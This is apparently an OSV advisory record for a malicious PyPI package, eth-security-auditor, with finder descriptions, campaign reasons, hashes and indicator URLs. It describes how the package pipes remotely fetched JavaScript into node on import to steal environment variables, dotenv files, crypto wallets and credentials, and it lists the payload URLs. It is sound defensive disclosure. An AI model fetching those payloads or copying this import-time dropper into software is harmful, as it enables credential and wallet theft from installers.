MAL-2026-4261

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/eth-security-auditor/MAL-2026-4261.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4261

Published

2026-05-22T20:30:51Z

Modified

2026-05-26T06:03:10.353656003Z

Summary

Malicious code in eth-security-auditor (PyPI)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (8e20bc5304d65563ad8b577a38c26db0b04746828b554f88cf5dd1215a214cf1)

On import, ethsecurityauditor/init.py unconditionally fetches a JavaScript payload from https://ddjidd564.github.io/defi-security-best-practices/payloads/compliance-scanner-light.js using curl and pipes the response into node -e, executing arbitrary remote code on the installer's machine. The URL is unpinned, no hash or signature check is performed, errors are silently swallowed, and the host is a personal GitHub Pages account that does not match the package's claimed publisher (github.com/solidity-security-alliance). The package brands itself as an Ethereum security auditor to add credibility, which conflicts with the personal-account payload host and the use of Node.js to execute remote JS from a Python package's import path. This is a textbook dropper: mutable attacker-controlled URL, executed at every first import, with no opt-in.

Source: kam193 (f08c76ae889813c4d48537a2fb0d3efbd359de58ff3952f00053ea4940bdedfc)

During import, the package downloads a remote JS script that then exfiltrates environmental variables, dotenv files, cryptowallets data and other sensitive informations. It's part of a broader campaign across PyPI, NPM and Github.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-05-eth-security-auditor

Reasons (based on the campaign):

files-exfiltration
exfiltration-env-variables
crypto-related
Downloads and executes a remote malicious script.
exfiltration-crypto
exfiltration-credentials

Database specific

{
    "malicious-packages-origins": [
        {
            "source": "kam193",
            "id": "pypi/2026-05-eth-security-auditor/eth-security-auditor",
            "sha256": "f08c76ae889813c4d48537a2fb0d3efbd359de58ff3952f00053ea4940bdedfc",
            "versions": [
                "0.1.0"
            ],
            "import_time": "2026-05-22T21:55:13.069543692Z",
            "modified_time": "2026-05-22T21:30:30.9097Z"
        },
        {
            "source": "kam193",
            "import_time": "2026-05-24T06:19:57.540485446Z",
            "sha256": "96635dab56130f85f55fbbacffc215c94e9ca556640d05d381a1d58998d6c794",
            "id": "pypi/2026-05-eth-security-auditor/eth-security-auditor",
            "versions": [
                "0.1.0"
            ],
            "modified_time": "2026-05-22T21:30:30.9097Z"
        },
        {
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:52:14.874616951Z",
            "sha256": "8e20bc5304d65563ad8b577a38c26db0b04746828b554f88cf5dd1215a214cf1",
            "id": "IN-MAL-2026-004256",
            "versions": [
                "0.1.0"
            ],
            "modified_time": "2026-05-22T20:30:51Z"
        }
    ],
    "iocs": {
        "domains": [
            "ddjidd564.github.io"
        ],
        "urls": [
            "https://ddjidd564.github.io/defi-security-best-practices/payloads/compliance-scanner-light.js",
            "https://ddjidd564.github.io/defi-security-best-practices/payloads/risk-profiler.js"
        ]
    }
}

References

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com
- Kamil Mańkowski (kam193) - REPORTER
- - https://github.com/kam193
  - https://bad-packages.kam193.eu/

Affected packages

PyPI / eth-security-auditor

Package

Name: eth-security-auditor; View open source insights on deps.dev
Purl: pkg:pypi/eth-security-auditor

Affected ranges

Affected versions

0.*

0.1.0

Database specific

indicators

{
    "package_integrity": [
        {
            "hashes": {
                "md5": "3387e4b595e3cbb7a96c5d3e58b79424",
                "sha256": "27512ee5687ee7d89c235011143d51b61952a05e17bf94e73654c114592cb35a",
                "blake2b_256": "8945d5133c53c4fa24ba2e1b46ad18a1362ff9e237bb2ee1d2edd35a87c61a61"
            },
            "filename": "eth_security_auditor-0.1.0-py3-none-any.whl"
        }
    ],
    "evidence_files": [
        {
            "tlsh": "3f41d1369c9a7630b396c06f4516b1055b8875c3b80c2429b9bcb2236fed168d277bbc",
            "sha256": "d1a058dc8663d4925aac9206b1bc0d85ededd0b60f876ed762fe9ffa275e143d",
            "path": "eth_security_auditor/__init__.py"
        },
        {
            "tlsh": "0d216f0322cbb9b448d2098b5772f6c91e029b48fa4d104f56e8a20be7d20d0c33f3b2",
            "sha256": "24a31bfb78be1f810b83a3e858b143b82ad150b40edd9b07e2b3434996b3a053",
            "path": "eth_security_auditor-0.1.0.dist-info/METADATA"
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/eth-security-auditor/MAL-2026-4261.json"

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]